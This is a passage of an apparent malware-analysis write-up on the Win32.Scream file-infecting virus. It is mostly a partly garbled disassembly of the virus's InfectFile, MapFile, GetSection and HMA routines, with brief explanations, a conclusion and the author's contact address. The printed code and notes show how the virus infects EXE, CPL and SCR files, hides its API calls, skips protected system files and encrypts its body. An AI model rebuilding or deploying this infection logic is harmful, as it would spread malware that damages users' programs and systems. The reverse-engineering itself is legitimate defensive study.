69 CODE: C jnz CODE: C CODE: CODE: CODE: cmp SFC_enabled, 0 CODE: jnz CODE: CODE: B push ebx CODE: C push 0 CODE: E mov al, 21h CODE: call StealthAPI CODE: CODE: test eax, eax CODE: CODE: CODE: D CODE: D push 80h CODE: push edi CODE: mov al, 11h CODE: call StealthAPI CODE: CODE: A test eax, eax CODE: C CODE: C CODE: lea eax, [ebp+168h] CODE: push 0 CODE: A push 80h CODE: F push 3 CODE: push 0 CODE: push 0 CODE: push 0C h CODE: A push eax CODE: B mov al, 14h CODE: D call StealthAPI CODE: D CODE:004038A2 mov [ebp+134h], eax CODE:004038A8 inc eax CODE:004038A9 CODE:004038A9 CODE:004038AF mov ecx, [ebp+15ch] CODE:004038B5 call MapFile CODE:004038B5 CODE:004038BA CODE:004038BA CODE:004038C0 cmp word ptr [eax], 'ZM' CODE:004038C5 CODE:004038C5 CODE:004038CB xor edx, edx CODE:004038CD call GetSection CODE:004038CD CODE:004038D2 cmp dword ptr [esi], 'EP' CODE:004038D8 CODE:004038D8 CODE:004038DE test dword ptr [ebx+24h], h CODE:004038E5 CODE:004038E5

70 CODE:004038EB mov eax, [esi+50h] CODE:004038EE cmp eax, [ebp+15ch] CODE:004038F4 jnz CODE:004038F4 CODE:004038FA mov eax, [ebx+10h] CODE:004038FD test eax, eax CODE:004038FF jz CODE:004038FF CODE: sub eax, [ebx+8] CODE: neg eax CODE: A jge short CODE: A CODE: C mov eax, [ebx+10h] CODE: F mov [ebx+8], eax CODE: xor eax, eax CODE: CODE: CODE: CODE: mov [ebp+288h], eax CODE: A add eax, 368Ch CODE: F add eax, [ebx+10h] CODE: add eax, [ebx+14h] CODE: mov ecx, [esi+3ch] CODE: add eax, ecx CODE: A div ecx CODE: C mul ecx CODE: E mov [esi+50h], eax CODE: mov [ebp+28ch], eax CODE: push eax CODE: push dword ptr [ebp+284h] CODE: E mov al, 0Ah CODE: call StealthAPI CODE: CODE: push dword ptr [ebp+138h] CODE: B mov al, 5 CODE: D call StealthAPI CODE: D CODE: pop ecx CODE: call MapFile CODE: CODE: CODE: CODE: E call GetSection CODE: E CODE: mov edi, [ebx+14h] CODE: add edi, [ebx+10h] CODE: add edi, [ebp+284h] CODE: F mov ecx, [ebp+288h] CODE: jecxz CODE: CODE: add [ebx+10h], ecx CODE: A xor eax, eax CODE: C rep stosb CODE: C CODE: E CODE: E mov [ebp+2b4h], edi

71 CODE: push esi CODE: mov ecx, 368Ch CODE: A lea esi, EntryPoint CODE: rep movsb CODE: pop esi CODE: pusha CODE: mov edx, [ebx+0ch] CODE: add edx, [ebx+10h] CODE: A mov [ebp+2b0h], edx CODE:004039A0 add edx, [esi+34h] CODE:004039A3 lea eax, EntryPoint CODE:004039A9 sub edx, eax CODE:004039AB lea esi, [edi-368ch] CODE:004039B1 sub edi, 88Ah CODE:004039B7 call HMA CODE:004039B7 CODE:004039BC lea edi, [esi+2f3eh] CODE:004039C2 mov ecx, 20h CODE:004039C7 xor eax, eax CODE:004039C9 rep stosb CODE:004039CB lea edi, [esi+2f16h] CODE:004039D1 lea esi, [esi+276ah] CODE:004039D7 push 0FFFFFh CODE:004039DC push 698h CODE:004039E1 push esi CODE:004039E2 push edi CODE:004039E3 call RDKE32Encrypt CODE:004039E3 CODE:004039E8 popa CODE:004039E9 mov eax, 368Ch CODE:004039EE mov ecx, [esi+3ch] CODE:004039F1 add eax, ecx CODE:004039F3 xor edx, edx CODE:004039F5 div ecx CODE:004039F7 mul ecx CODE:004039F9 add [ebx+10h], eax CODE:004039FC add [ebx+8], eax CODE:004039FF sub eax, 368Ch CODE:00403A04 xchg eax, ecx CODE:00403A05 xor eax, eax CODE:00403A07 rep stosb CODE:00403A09 mov dword ptr [ebx+24h], 0E h CODE:00403A10 add dword ptr [esi+64h], 2000h CODE:00403A17 pusha CODE:00403A18 call GetSection CODE:00403A18 CODE:00403A1D CODE:00403A1D CODE:00403A1D or dword ptr [eax+24h], 0E h CODE:00403A24 add eax, 28h CODE:00403A27 cmp eax, ebx CODE:00403A29 jnz short CODE:00403A29 CODE:00403A2B popa CODE:00403A2C call GetSection CODE:00403A2C CODE:00403A31 mov ebx, [esi+28h]

72 CODE:00403A34 xchg eax, esi CODE:00403A35 sub esi, 28h CODE:00403A35 CODE:00403A38 CODE:00403A38 CODE:00403A38 CODE:00403A38 add esi, 28h CODE:00403A3B mov eax, [esi+0ch] CODE:00403A3E cmp eax, ebx CODE:00403A40 ja short CODE:00403A40 CODE:00403A42 add eax, [esi+8] CODE:00403A45 cmp eax, ebx CODE:00403A47 jb short CODE:00403A47 CODE:00403A49 mov [ebp+290h], esi CODE:00403A4F or dword ptr [esi+24h], h CODE:00403A56 mov edi, [ebp+284h] CODE:00403A5C mov edx, [esi+14h] CODE:00403A5F add edx, edi CODE:00403A61 mov [ebp+294h], edx CODE:00403A67 add edx, [esi+10h] CODE:00403A6A mov [ebp+298h], edx CODE:00403A70 sub ebx, [esi+0ch] CODE:00403A73 add ebx, [esi+14h] CODE:00403A76 lea esi, [ebx+edi] CODE:00403A79 sub esp, 400h CODE:00403A7F mov [ebp+2a4h], esp CODE:00403A85 and dword ptr [ebp+2a0h], 0 CODE:00403A8C mov eax, 10h CODE:00403A91 call RandomNumber CODE:00403A91 CODE:00403A96 inc eax CODE:00403A97 mov [ebp+2ach], eax CODE:00403A9D and dword ptr [ebp+2a8h], 0 CODE:00403AA4 mov dword ptr [ebp+2fch], 10000h CODE:00403AA4 CODE:00403AAE CODE:00403AAE CODE:00403AAE cmp esi, [ebp+294h] CODE:00403AB4 jb CODE:00403AB4 CODE:00403AB6 cmp esi, [ebp+298h] CODE:00403ABC ja CODE:00403ABC CODE:00403ABE call ILE CODE:00403ABE CODE:00403AC3 test ecx, ecx CODE:00403AC5 jz CODE:00403AC5 CODE:00403AC7 dec dword ptr [ebp+2fch] CODE:00403ACD CODE:00403ACD CODE:00403AD3 cmp ecx, 5 CODE:00403AD6 CODE:00403AD6

73 CODE:00403ADC cmp dword ptr [ebp+2b8h], 0 CODE:00403AE3 jz CODE:00403AE3 CODE:00403AE5 dec dword ptr [ebp+2b8h] CODE:00403AEB CODE:00403AEB CODE:00403AF0 CODE:00403AF0 CODE:00403AF0 CODE:00403AF0 mov ecx, [ebp+2a0h] CODE:00403AF6 test ecx, ecx CODE:00403AF8 CODE:00403AF8 CODE:00403AFE mov esi, [ebp+2a4h] CODE:00403B04 dec ecx CODE:00403B05 lea esi, [esi+ecx*4] CODE:00403B08 mov esi, [esi] CODE:00403B0A dec dword ptr [ebp+2a0h] CODE:00403B10 jmp CODE:00403B10 CODE:00403B12 CODE:00403B12 CODE:00403B12 push eax CODE:00403B13 mov eax, 64h CODE:00403B18 call RandomNumber CODE:00403B18 CODE:00403B1D test eax, eax CODE:00403B1F pop eax CODE:00403B20 jnz CODE:00403B20 CODE:00403B22 mov edi, [ebp+2a8h] CODE:00403B28 cmp edi, [ebp+2ach] CODE:00403B2E CODE:00403B2E CODE:00403B34 pusha CODE:00403B35 mov ebx, esi CODE:00403B37 lea esi, [ebp+2bch] CODE:00403B3D mov ecx, [ebp+2a8h] CODE:00403B43 jecxz CODE:00403B43 CODE:00403B45 CODE:00403B45 lodsd CODE:00403B46 cmp eax, ebx CODE:00403B48 jnz CODE:00403B48 CODE:00403B4A popa CODE:00403B4B jmp CODE:00403B4B CODE:00403B4D CODE:00403B4D CODE:00403B4D CODE:00403B4D CODE:00403B4F

74 CODE:00403B4F CODE:00403B4F popa CODE:00403B50 mov [ebp+edi*4+2bch], esi CODE:00403B57 inc dword ptr [ebp+2a8h] CODE:00403B5D push eax CODE:00403B5E mov eax, 40h CODE:00403B63 call RandomNumber CODE:00403B63 CODE:00403B68 mov [ebp+2b8h], eax CODE:00403B6E pop eax CODE:00403B6E CODE:00403B6F CODE:00403B6F CODE:00403B6F CODE:00403B6F pusha CODE:00403B70 pusha CODE:00403B71 xchg eax, edx CODE:00403B72 mov edi, esi CODE:00403B74 test bl, 10b CODE:00403B77 jz short CODE:00403B77 CODE:00403B79 mov ebx, 24h CODE:00403B7E cmp dx, 0F80h CODE:00403B83 jz short CODE:00403B83 CODE:00403B85 cmp dx, 0F88h CODE:00403B8A jnz short CODE:00403B8A CODE:00403B8C CODE:00403B8C CODE:00403B8C CODE:00403B8C lea esi, SpecialHandlers CODE:00403B92 add ebx, esi CODE:00403B94 jmp ebx CODE:00403B94 CODE:00403B96 CODE:00403B96 CODE:00403B96 CODE:00403B96 lea esi, EIPOpcodeTable CODE:00403B96 CODE:00403B9C CODE:00403B9C CODE:00403B9C lodsb CODE:00403B9D movzx ecx, al CODE:00403BA0 jecxz short CODE:00403BA0 CODE:00403BA2 lodsd CODE:00403BA3 xchg eax, ebx CODE:00403BA3 CODE:00403BA4 CODE:00403BA4 CODE:00403BA4 lodsb CODE:00403BA5 cmp al, dl CODE:00403BA7 jz short CODE:00403BA7 CODE:00403BA9 loop CODE:00403BA9

75 CODE:00403BAB jmp short CODE:00403BAB CODE:00403BAD CODE:00403BAD CODE:00403BAD CODE:00403BAD cmp dl, 0FFh CODE:00403BB0 jnz short CODE:00403BB0 CODE:00403BB2 mov esi, edi CODE:00403BB4 inc esi CODE:00403BB5 lodsb CODE:00403BB6 and al, 38h CODE:00403BB8 cmp al, 20h CODE:00403BBA jz SpecialHandlers CODE:00403BBA CODE:00403BC0 CODE:00403BC0 CODE:00403BC0 CODE:00403BC0 popa CODE:00403BC1 clc CODE:00403BC1 CODE:00403BC2 CODE:00403BC2 CODE:00403BC2 CODE:00403BC2 popa CODE:00403BC3 jb CODE:00403BC3 CODE:00403BC9 add esi, ecx CODE:00403BCB jmp CODE:00403BCB CODE:00403BD0 CODE:00403BD0 CODE:00403BD0 CODE:00403BD0 CODE:00403BD0 mov eax, [ebp+2a4h] CODE:00403BD6 lea esp, [eax+400h] CODE:00403BDC mov ecx, [ebp+2a8h] CODE:00403BE2 jecxz short CODE:00403BE2 CODE:00403BE4 CODE:00403BE4 CODE:00403BE4 dec ecx CODE:00403BE5 mov esi, [ebp+ecx*4+2bch] CODE:00403BEC push esi CODE:00403BED imul edi, ecx, 9 CODE:00403BF0 add edi, [ebp+2b4h] CODE:00403BF6 add edi, 2F93h CODE:00403BFC push edi CODE:00403BFD movsb CODE:00403BFE movsd CODE:00403BFF call GetSection CODE:00403BFF CODE:00403C04 pop edx CODE:00403C05 pop edi CODE:00403C06 mov al, 0E8h CODE:00403C08 stosb CODE:00403C09 lea eax, [edi+4]

76 CODE:00403C0C sub eax, [ebp+294h] CODE:00403C12 mov ebx, [ebp+290h] CODE:00403C18 add eax, [ebx+0ch] CODE:00403C1B push dword ptr [esi+34h] CODE:00403C1E pop dword ptr [edx-4] CODE:00403C21 add [edx-4], eax CODE:00403C24 sub eax, [ebp+2b0h] CODE:00403C2A neg eax CODE:00403C2C stosd CODE:00403C2D test ecx, ecx CODE:00403C2F jnz short CODE:00403C2F CODE:00403C31 push 0 CODE:00403C33 mov eax, esp CODE:00403C35 push 0 CODE:00403C37 push esp CODE:00403C38 push eax CODE:00403C39 push dword ptr [ebp+28ch] CODE:00403C3F push dword ptr [ebp+284h] CODE:00403C45 mov al, 20h CODE:00403C47 call StealthAPI CODE:00403C47 CODE:00403C4C mov ebx, [esp+46ch+var_46c] CODE:00403C4F mov [eax+58h], ebx CODE:00403C52 add esp, 8 CODE:00403C55 inc dword ptr [ebp+280h] CODE:00403C55 CODE:00403C5B CODE:00403C5B CODE:00403C5B push dword ptr [ebp+284h] CODE:00403C61 mov al, 0Ah CODE:00403C63 call StealthAPI CODE:00403C63 CODE:00403C68 CODE:00403C68 CODE:00403C68 push dword ptr [ebp+138h] CODE:00403C6E mov al, 5 CODE:00403C70 call StealthAPI CODE:00403C70 CODE:00403C75 lea eax, [ebp+150h] CODE:00403C7B push eax CODE:00403C7C lea eax, [ebp+148h] CODE:00403C82 push eax CODE:00403C83 lea eax, [ebp+140h] CODE:00403C89 push eax CODE:00403C8A push dword ptr [ebp+134h] CODE:00403C90 mov al, 12h CODE:00403C92 call StealthAPI CODE:00403C92 CODE:00403C97 push dword ptr [ebp+134h] CODE:00403C9D mov al, 5 CODE:00403C9F call StealthAPI CODE:00403C9F CODE:00403CA4

77 CODE:00403CA4 lea eax, [ebp+168h] CODE:00403CAA push dword ptr [ebp+13ch] CODE:00403CB0 push eax CODE:00403CB1 mov al, 11h CODE:00403CB3 call StealthAPI CODE:00403CB3 CODE:00403CB8 CODE:00403CB8 CODE:00403CB8 CODE:00403CB8 xor ebx, ebx CODE:00403CBA push dword ptr [ebp+0f0h] CODE:00403CC0 pop dword ptr fs:[ebx] CODE:00403CC3 popa CODE:00403CC4 and InfectState, 0 CODE:00403CCB retn CODE:00403CCB CODE:00403CCB InfectFile endp CODE:00403CF3 SpecialHandlers: CODE:00403CF3 CODE:00403CF3 popa CODE:00403CF4 popa CODE:00403CF5 The pevious code checks if a file can be infected, and will infect it if possible. The virus infects EXE, CPL, OCR and SCR files. It sets RWX on all sections. The infected files are checksumed (PE Header). It also avoid Self Extractors. It saves filetime and attributes. Infects only files within a certain interval (32kb 1024kb) with some random exceptions. X flag on last section is infection mark. It avoids files that are protected by SFC/SFP/WFP. The infection code is encrypted with RDKE32. CODE:00403D78 GetSection proc near CODE:00403D78 CODE:00403D78 mov esi, [ebp+284h] CODE:00403D7E add esi, [esi+3ch] CODE:00403D81 movzx eax, word ptr [esi+14h] CODE:00403D85 lea eax, [eax+esi+18h] CODE:00403D89 movzx ebx, word ptr [esi+6] CODE:00403D8D dec ebx CODE:00403D8E imul ebx, 28h CODE:00403D91 add ebx, eax CODE:00403D93 retn CODE:00403D93 CODE:00403D93 GetSection endp The previous code block calculates a pointer to the last section header. CODE:00403D94 MapFile proc near CODE:00403D94 CODE:00403D94 push 0 CODE:00403D96 push ecx CODE:00403D97 push 0 CODE:00403D99 push 4 CODE:00403D9B push 0 CODE:00403D9D push dword ptr [ebp+134h] CODE:00403DA3 mov al, 0Bh CODE:00403DA5 call StealthAPI

78 CODE:00403DA5 CODE:00403DAA test eax, eax CODE:00403DAC jz short CODE:00403DAC CODE:00403DAE mov [ebp+138h], eax CODE:00403DB4 push 0 CODE:00403DB6 push 0 CODE:00403DB8 push 0 CODE:00403DBA push 6 CODE:00403DBC push eax CODE:00403DBD mov al, 9 CODE:00403DBF call StealthAPI CODE:00403DBF CODE:00403DC4 mov [ebp+284h], eax CODE:00403DC4 CODE:00403DCA CODE:00403DCA test eax, eax CODE:00403DCC retn CODE:00403DCC CODE:00403DCC MapFile endp The previous code block maps a file to memory for easy access. CODE:00403DCD HMA proc near CODE:00403DCD pusha CODE:00403DCD CODE:00403DCE CODE:00403DCE push esi CODE:00403DCF push edx CODE:00403DD0 call ILE CODE:00403DD0 CODE:00403DD5 add esi, edx CODE:00403DD7 pop edx CODE:00403DD8 or bh, bh CODE:00403DDA jnz CODE:00403DDA CODE:00403DDC inc esi CODE:00403DDD cmp al, 0A1h CODE:00403DDF jz CODE:00403DDF CODE:00403DE1 cmp al, 0A3h CODE:00403DE3 jz CODE:00403DE3 CODE:00403DE5 dec esi CODE:00403DE6 test bl, 4 CODE:00403DE9 jz CODE:00403DE9 CODE:00403DEB and bl, 3 CODE:00403DEE add esi, ebx CODE:00403DF0 lodsb CODE:00403DF1 and al, 0C7h CODE:00403DF3 cmp al, 5 CODE:00403DF5 jnz

79 CODE:00403DF5 CODE:00403DF7 CODE:00403DF7 CODE:00403DF7 CODE:00403DF7 add [esi], edx CODE:00403DF7 CODE:00403DF9 CODE:00403DF9 CODE:00403DF9 CODE:00403DF9 pop esi CODE:00403DFA add esi, ecx CODE:00403DFC cmp esi, edi CODE:00403DFE jnz short CODE:00403DFE CODE:00403E00 popa CODE:00403E01 retn CODE:00403E01 CODE:00403E01 HMA endp The previous code block is the main entry routine for the Hard coded Memory Access (HMA). The function expects the start of code in the ESI register, the new offsets in the EDI register and the delta offset in the EBP register. CODE: D FRC_MakeCRC32Table proc near CODE: D CODE: D pusha CODE: E cld CODE: E CODE: F CODE: F CODE: F mov al, [esi] CODE: test al, al CODE: jnz short CODE: CODE: popa CODE: retn CODE: CODE: CODE: CODE: CODE: call GetCRC32OfString CODE: CODE: C xchg eax, ebx CODE: D stosd CODE: E jmp short CODE: E CODE: E FRC_MakeCRC32Table endp The previous code block creates a CRC32 table for the virus to use later. CODE: FRC_FakeHost CODE: CODE: dd h, 0FFB99090h, 90FFFFFFh, 68006A90h

80 CODE: CODE: CODE: CODE: CODE: C CODE: dd offset NAME_SFC_DLL db 68h dd offset NAME_IMAGEHLP_DLL db 6Ah, 0, 0E8h dd 40Bh, 0F8E8006Ah db 3, 2 dup(0) The previous code block is the fake host of the virus. It shows a message and then exits. 5. Conclusion So, this was a journey through Win32.Scream. And that was an interesting one. So far I have reversed all of it s internals and well documented it as well. You ll find more information in each sepereate file that is found in the package. 6. Contact You can either contact me by e mail or IM. Feel free to write/send me your comments, ideas, feedbacks or criticism. For better security it would be better if you send me mails signed with my key, but it s not mandatory. E Mail: iamhalsten [at] gmail [dot] com IM: iamhalsten [at] hotmail [dot] com